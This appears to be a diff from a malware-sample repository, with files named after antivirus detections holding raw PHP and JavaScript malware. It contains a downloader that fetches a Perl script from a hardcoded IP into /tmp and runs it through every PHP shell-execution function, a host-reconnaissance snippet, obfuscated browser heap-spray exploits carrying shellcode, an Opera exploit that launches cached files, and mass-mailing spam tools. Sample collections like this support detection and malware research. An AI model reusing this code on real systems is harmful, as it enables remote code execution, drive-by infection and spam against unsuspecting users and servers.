<input type="text" name="subject" value="<? print $subject; ?>"
size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="60" rows="10"><? print $message;
?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
Plain
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send eMails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your
message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To:
$replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
?>
<p class="style1">PHP Mailer<br>
&copy JAMO BIZZ Connection 2007, July.<br>
</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');
</script>";}
?>
</body>
</html>

90
PHP/Trojan-Downloader.PHP.Mulitcom.d Normal file
View File

@ -0,0 +1,90 @@
<?
echo "AnakDompu";
@passthru('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;lwp-downloadhttp://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@system('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@popen('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/id/nusatenggara.txt >nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/id/nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/id/nusatenggara.txt > nusatenggara.txt;perl nusatenggara.txt;rm -f nusatenggara.txt*');
?>
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

1
PHP/Trojan-Downloader.PHP.Small.c Normal file
View File

File diff suppressed because one or more lines are too long

1
PHP/Trojan-Downloader.PHP.Small.d Normal file
View File

@ -0,0 +1 @@
if(!success){ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%44%43%45%32%46%38%42%31%2d%41%35%32%30%2d%31%31%44%34%2d%38%46%44%30%2d%30%30%44%30%42%37%37%33%30%32%37%37%27%20%69%64%3d%27%74%61%72%67%65%74%31%27%3e%3c%2f%6f%62%6a%65%63%74%3e%22%29%3b')); eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%39%44%33%39%32%32%33%45%2d%41%45%38%45%2d%31%31%44%34%2d%38%46%44%33%2d%30%30%44%30%42%37%37%33%30%32%37%37%27%20%69%64%3d%27%74%61%72%67%65%74%32%27%3e%3c%2f%6f%62%6a%65%63%74%3e%22%29%3b')); eval(unescape('%76%61%72%20%73%68%65%6c%6c%63%6f%64%65%3d%75%6e%65%73%63%61%70%65%28%73%68%65%6c%6c%63%6f%2b%27%25%75%33%30%33%31%27%29%3b')); bigblock=unescape("%u9090%u9090"); slackspace=20+shellcode.length while(bigblock.length<slackspace)bigblock+=bigblock; fillblock=bigblock.substring(0,slackspace); block=bigblock.substring(0,bigblock.length-slackspace); while(block.length+slackspace<0x40000)block=block+block+fillblock; memory=new Array(); for(x=0;x<800;x++){memory[x]=block+shellcode} buffer='\x0a'; while(buffer.length<5000)buffer+='\x0a\x0a\x0a\x0a'; try{try{eval(unescape('%74%61%72%67%65%74%31%2e%73%65%72%76%65%72%3d%62%75%66%66%65%72%3b%74%61%72%67%65%74%31%2e%69%6e%69%74%69%61%6c%69%7a%65%28%29%3b%74%61%72%67%65%74%31%2e%73%65%6e%64%28%29'));} catch(e){eval(unescape('%74%61%72%67%65%74%32%2e%73%65%72%76%65%72%3d%62%75%66%66%65%72%3b%74%61%72%67%65%74%32%2e%72%65%63%65%69%76%65%28%29%3b'));}}catch(e){} }

1
PHP/Trojan-Downloader.PHP.Small.e Normal file
View File

@ -0,0 +1 @@
if(!success){ exeurl=url; blank=document.createElement('iframe'); blank.src='about:blank'; blank.setAttribute('id','blank_window'); blank.setAttribute('style','display:none'); document.appendChild(blank); blank_window.eval("build=document.createElement('iframe'); build.src='opera:about'; build.onload=function(){if(build.contentDocument.childNodes[0].innerHTML.indexOf('8771')==-1){ document.write(''); setTimeout("parent.op9()",4000);};}; document.appendChild(build);"); } function op9(){ blank_window.eval("function tempname(from,url){ iUrl=from.indexOf(url); iTr=from.indexOf('',iUrl-60); return from.substr(iTr+8,12);} config=document.createElement('iframe'); config.setAttribute('id','config_window'); config.src='opera:config'; document.appendChild(config); var tosearch=url; cache=document.createElement('iframe'); cache.src='opera:cache'; cache.onload=function() { filename=tempname(cache.contentDocument.childNodes[0].innerHTML,tosearch); if(!filename)setTimeout('op9()',5000); config_window.eval(" opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename); app_link=document.createElement('a'); app_link.setAttribute('href','tn3270://nothing'); app_link.click(); setTimeout(function(){opera.setPreference('Network','TN3270 App','telnet.exe')},1000);");}; document.appendChild(cache);"); }

9
PHP/Trojan-Downloader.PHP.Small.f Normal file
View File

@ -0,0 +1,9 @@
<script>
x=unescape("%PuP9P0P9S0M%MuM9M0S9I0M%SuS1I8I6PA@%PuP6I4@5PBS%@uM0@3M8IBI%MuI4@0S8SBS%PuM8MBM3S0@%@uI1P8M4S0S%MuP5@8P0S5M%@uS0M0P0@1@%Mu@3S3I0S0P%MuP8M9@DI2P%IuI8I9S1P0M%MuS0P4M5I0P%Pu@5P0I8@9S%@u@8P9I0I8P%IuI0SCP5P0S%PuSCS0I8M3@%Mu@8I9P2@8M%SuI8S9M0@0P%@uS0M4S4@0@%SuPCS0S8M3P%Su@6M6@0@8S%PuS7S8@3SDS%SuS7ICP0M5S%MuM8MBMFS2M%@uI8M1@DM8P%IuS9S0PCP3S%PuS0@0S0M0@%PuP8M9P0@0M%Su@3I3I1I8S%@uM8@3IDS2I%MuS0I4@CS0I%@uI1M0I8M9M%@uSCS0S8M3P%@uI8I1M0S4@%@uI8@0IC@3I%@uP0S0P0P0P%MuI8S9P0M0P%SuS3S3P1P8S%IuM8P9MCS0I%SuM8S3S0P3I%Mu@0I4PCI3M%@uS8P1@6I6S%PuM8S8SF@B@%@uS7SCI1PE@%SuI8SB@FS4P%IuM8I1SDI3I%PuP7I0@EPBI%@u@0@0P1SEM%@uS6I6P0P0@%@uP3@3P8@BI%PuI8M9P6M6@%IuM4M2M3M2S%Su@CI6M4M2S%MuS0S8S0M2I%IuP6M6@4I2I%PuI3M2P8IBM%Su@3I1I6P6M%IuP4@2P3I2M%SuMC@6P4I2S%@uP1@4I0M2S%MuS6I6@4P2M%IuS3S2S8IBM%SuM3@1S6P6P%MuM4P2M3P2@%SuS6P6@4P2I%Mu@C@3@8S1I%MuP0M1S6M0P%IuM1P3S8S9I%SuI5I3S8S9M%IuS8S9@0M4I%IuI8@9M1@AS%IuP0S4I5MAI%@uP9I0S9I0@%PuM9I0@9P0@%IuP9@0I9S0S%@uS0@fSeIb@%@uI3@3P5SbI%Mu@6P6ScP9I%@u@8@0PbM9P%PuS8S0P0P1S%@uPeMf@3P3P%SuMe@2S4M3I%Pu@ePbPf@aI%PuIeP8S0P5I%Su@fMfSeMcP%@uMfIfIfPfS%SuI8SbP7Pf@%MuMdSfM4PeS%SuIeMfPeIfI%MuI6M4Pe@f@%SuIe@3@aIf@%PuS9Sf@6P4S%@uM4@2MfS3@%MuI9MfM6S4I%PuM6SeIeP7P%IuIe@fM0I3@%SuIe@fSeMb@%@uI6S4IeIfP%@uMbM9@0P3P%IuP6S1M8I7P%Su@e@1IaI1@%IuP0P7S0P3M%PuPe@fS1M1S%SuIePfIeIf@%PuPaSa@6I6@%@uIb@9MeIbI%SuI7S7I8@7P%@uI6P5I1S1I%@uS0M7MeP1@%@uPe@fP1PfP%MuPe@fPeSfI%SuSaSaS6M6M%SuIbP9IeM7P%Iu@cIaM8S7I%SuS1P0@5SfS%Su@0@7P2IdM%@u@eMfI0SdP%SuMeSfIeIfI%SuMa@aP6P6M%Mu@bI9MeM3I%IuI0I0P8@7P%SuM0MfS2P1P%@uI0P7I8@fI%MuIeMfP3@b@%Pu@eIfPeMfI%PuSaPaM6P6M%PuIbP9IfPfS%SuI2IeS8S7I%PuM0Sa@9@6S%@uI0S7M5P7M%MuMeMfI2P9I%Pu@eIfMeSfI%@u@aIaM6@6P%IuSaPfPfSbI%@uIdS7M6IfI%Iu@9@aM2IcS%IuS6@6P1@5I%IuSfP7PaPaM%SuMeI8M0I6M%Su@eIfSeIeM%MuSb@1SeSfS%SuP9PaP6I6M%PuI6M4@cMb@%SuPeSbPaIa@%@uIe@e@8I5@%IuM6P4SbP6I%IuMfM7PbIaM%@u@0M7SbI9M%Pu@eMfM6S4S%@uIeMfIe@fS%PuP8M7PbIfS%Pu@fI5MdS9M%PuM9MfMc@0S%SuI7M8@0M7P%SuSeMfSeMfP%Su@6@6IeIf@%IuSfI3@aMa@%@u@2IaI6M4M%@uI2IfS6IcS%PuI6@6IbMf@%MuIcSfIaIa@%@uM1S0P8S7S%@u@e@f@eMfI%PuMbPfIePfM%SuSaMaI6P4P%Pu@8S5@f@bI%PuPb@6SeSdS%MuIbPaM6I4P%@u@0I7MfM7@%SuPeSfS8IeS%IuSe@fSePfS%SuIaPaIeScM%MuS2S8@cSf@%SuMbM3Me@fI%@uPcP1P9@1@%PuI2I8@8MaS%SuIeSbIaMf@%Iu@8MaP9I7@%SuSeSfSe@fM%PuP9@a@1I0P%PuI6S4Mc@f@%IuPeM3@aIaP%MuMe@eM8S5@%@uI6M4PbI6M%SuPfS7PbMa@%SuMaSf@0P7P%PuMeSfSe@fS%IuM8M5Ie@fI%IuSbP7@eP8@%PuMaIaMe@cP%@uIdMcIcIbM%@uMbScP3I4P%SuM1S0PbMcS%SuScSfI9MaM%IuIbIcPbPfI%MuSaIaS6@4@%MuM8P5SfI3M%IuMb@6SeSaM%SuSbPaM6P4P%SuP0@7@fM7S%IuPeIfMcMc@%SuPe@f@eIfI%PuPeSf@8I5P%IuP9PaS1@0M%Pu@6I4ScIfM%@uSeS7MaSaP%Iu@e@dM8@5S%IuI6@4PbI6S%MuPfS7@bMa@%IuMf@fM0@7@%@u@e@fSe@f@%IuI8I5Pe@f@%@uM6@4M1P0S%IuIf@fMa@aI%Mu@eMeS8I5P%Pu@6@4@b@6S%@uIf@7PbMaM%MuIeSfP0M7S%@u@ePfMePfS%Iu@aIeIe@fM%Mu@bSdMb@4P%Iu@0PeSeIcP%IuM0Me@ePcP%Su@0@e@eScM%PuI0SePeMc@%@uP0M3P6IcS%@uMbS5MeIbP%PuS6M4SbPcP%Iu@0Id@3P5I%SuSbMdI1@8M%@uI0IfI1P0M%@uS6S4IbSa@%MuS6I4I0@3I%IuPe@7@9@2@%PuIbM2M6@4@%@u@bI9IeI3M%@u@9IcI6P4S%@uM6P4MdS3M%Mu@fP1@9IbP%@u@eSc@9@7P%Su@bS9@1IcI%MuS9P9P6I4@%@uIeMc@cMfS%PuPdSc@1ScI%PuMaP6S2P6I%@uM4M2MaSeM%Iu@2PcIePcS%SuPdPc@bI9M%SuMeS0@1@9@%@uPfIfS5P1@%Iu@1IdMdS5S%MuSeS7I9MbI%IuS2P1P2Pe@%Mu@eScSeS2S%PuPaSf@1SdM%@uP1IeP0M4@%IuS1@1IdP4P%MuI9@a@bI1@%@uIbM5S0Pa@%IuP0I4I6P4@%SuPbS5@6P4@%PuMeIcScSbM%@uM8P9M3S2I%Su@eS3P6S4I%Pu@6I4IaP4M%IuSfI3MbI5P%@uP3M2PePc@%IuSe@bM6I4P%IuIeIcM6I4I%MuIbS1@2PaP%@uI2PdSb@2@%MuIePfSeS7P%@uS1PbM0@7P%@uM1M0P1M1S%SuSbPaM1@0I%PuPa@3IbPdS%@uIaS0IaP2P%@u@eSfIa@1@%IuI7P4M6M8M%PuI7P0P7M4@%IuP2Mf@3@aM%IuI6M4@2PfP%MuM7M6S6I5P%@uS6@1M2MeI%@uP7@2I6M5I%SuM3P4@6Mf@%MuP6P3@2Se@%Su@2SfM6IeI%Su@6S4I6M1M%SuP6@1M7@0S%Pu@6PbM6I3M%SuS6IcM2MfI%Mu@6I1P6MfI%@uM2MeM6@4@%IuM6S8I7S0I%IuM0P0@7I0S%@uS0I0S0@0M".replace(/[IPSM@]/g, ''));
tu=unescape("%KuK0FdF04dK%cu40FdF0KdK".replace(/[Fc4Kr]/g, ''));
var memz=parseInt("0RxUdR0ZdU0ZdZ0Udl".replace(/[RUZrl]/g, ''));
while(tu.length<0x40000) tu+=tu;
tu=tu.substring(0,parseInt("0BxX3IfvfIeD4B".replace(/[vXIBD]/g, ''))-x.length);
o=new Array(); for(i=0;i<450;i++) o[i]=tu+x;z=Math.ceil(memz);
eval("z2=kdyo2c2uymke6nNt6.ksNcNryiyp6t6s6[k02]N.NcNrkekaNtyekC6o2nktyr6oylkR2a6n6g2ey(6)k.ylyeynkgyt2hk".replace(/[k2Ny6]/g, ''));
</script>

156
PHP/Trojan-Dropper.PHP.Agent.a Normal file
View File

File diff suppressed because one or more lines are too long

183
PHP/Trojan-Mailfinder.PHP.Massma.j Normal file
View File

@ -0,0 +1,183 @@
<?
include "./head.php";
If ($action=="mysql"){
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?><title></title>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<table width="813" height="209" border="0" background="image/php.gif">
<tr>
<td width="357"><p align="left"><font size="1" face="Geneva, Arial, Helvetica, sans-serif"></font></p>
<table width="355" border="0">
<tr>
<td width="345"><font color="#FF6600" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Your Email:</strong></font></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<? print $from; ?>" size="40">
</font></td>
</tr>
<tr>
<td><strong><font color="#FF0000" size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To: </font></strong></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
</font></td>
</tr>
<tr>
<td>&nbsp;</td>
</tr>
<tr>
<td><font color="#FF0000" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Subject: </strong></font></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="50">
</font></td>
</tr>
<tr>
<td><table width="345" border="0" align="left">
<tr>
<td width="97" height="30"><font color="#FF0000" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Your Name:</strong></font></td>
<td width="238"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
</table>
<p>&nbsp;</p>
<table width="425" border="0" align="left">
<tr>
<td width="88" height="28"><font color="#FF6600" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Attach File:</strong></font></td>
<td width="321"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
</table> <p>&nbsp;</p></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="radio" name="contenttype" value="plain" checked>
<font color="#FF0000"><strong>Plain</strong></font>
<input type="radio" name="contenttype" value="html">
<font color="#FF6600"><strong>HTML</strong></font>
<input type="hidden" name="action" value="send">
</font></td>
</tr>
<tr>
<td><p><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
<input type="submit" value="Send Message">
</font></p>
<p><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"><img src="image/Status.gif" width="147" height="72"></font></p></td>
</tr>
</table>
</td>
<td width="446"><table width="338" border="0">
<tr>
<td width="328">&nbsp;</td>
</tr>
<tr>
<td><p><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="40" rows="30"><? print $emaillist; ?></textarea>
<a href="?action=mysql"><strong><font color="#FF0000">Load Addresses from MySQL</font></strong></a> </font></p>
</td>
</tr>
</table>
<table width="336" border="0">
<tr>
<td width="326">&nbsp;</td>
</tr>
<tr>
<td><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">Change The Lanuage: </font></strong></td>
</tr>
<tr>
<td><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/KHG/PHP-Mailer/Albanian/index.php"><font color="#FF0000">Albanian</font></a> - <a href="/KHG/PHP-Mailer/German/index.php"><font color="#FF0000">German</font></a> - <a href="/KHG/PHP-Mailer/English/index.php"><font color="#FF0000">English</font> </a></font></strong></td>
</tr>
<tr>
<td><strong><font color="#FF6600" size="1" face="Verdana, Arial, Helvetica, sans-serif">Lanuage Now: <font color="#0000FF">English </font></font></strong></td>
</tr>
</table>
<p>&nbsp;</p>
</td>
</tr>
</table>
<p>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "<img src='image/sending.gif'><br> [ $to.......] ";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "<img src='image/success.gif'><br>";
flush();
}
}
}
include "./foot.php";
?>
</p>
<p>&nbsp; </p>
</form>

242
PHP/Trojan-Mailfinder.PHP.Massma.k Normal file
View File

@ -0,0 +1,242 @@
<?php
$secure = "babloki007@yahoo.de";
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>eMail</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
.Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C}
.Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000000}
.Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000000}
.style3 {color: #000000}
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<div id="layer" style="position:absolute; top:2px; left:-4px; width:560px; height:140px;">
<table border="0" cellspacing="0" cellpadding="0" width="560">
<tr valign="top">
<td><div align="center"></div></td>
</tr>
</table>
<p align="left"><img src="http://www.geocities.com/i5bala/images/linuxpenny.gif" alt="Sir-ToTTi" width="145" height="174" border="0" /></p>
</div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div id="idElement511" style="position:absolute; top:58px; left:168px; width:560px; height:140px;">
